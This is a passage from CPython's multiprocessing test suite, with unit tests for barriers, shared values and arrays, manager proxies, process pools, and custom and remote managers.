self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# call pool.terminate()
# pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with support.check_warnings(('unclosed running multiprocessing pool',
ResourceWarning)):
pool = None
support.gc_collect()
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
def test_worker_finalization_via_atexit_handler_of_multiprocessing(self):
# tests cases against bpo-38744 and bpo-39360
cmd = '''if 1:
from multiprocessing import Pool
problem = None
class A:
def __init__(self):
self.pool = Pool(processes=1)
def test():
global problem
problem = A()
problem.pool.map(float, tuple(range(10)))
if __name__ == "__main__":
test()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
self.assertEqual(rc, 0)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
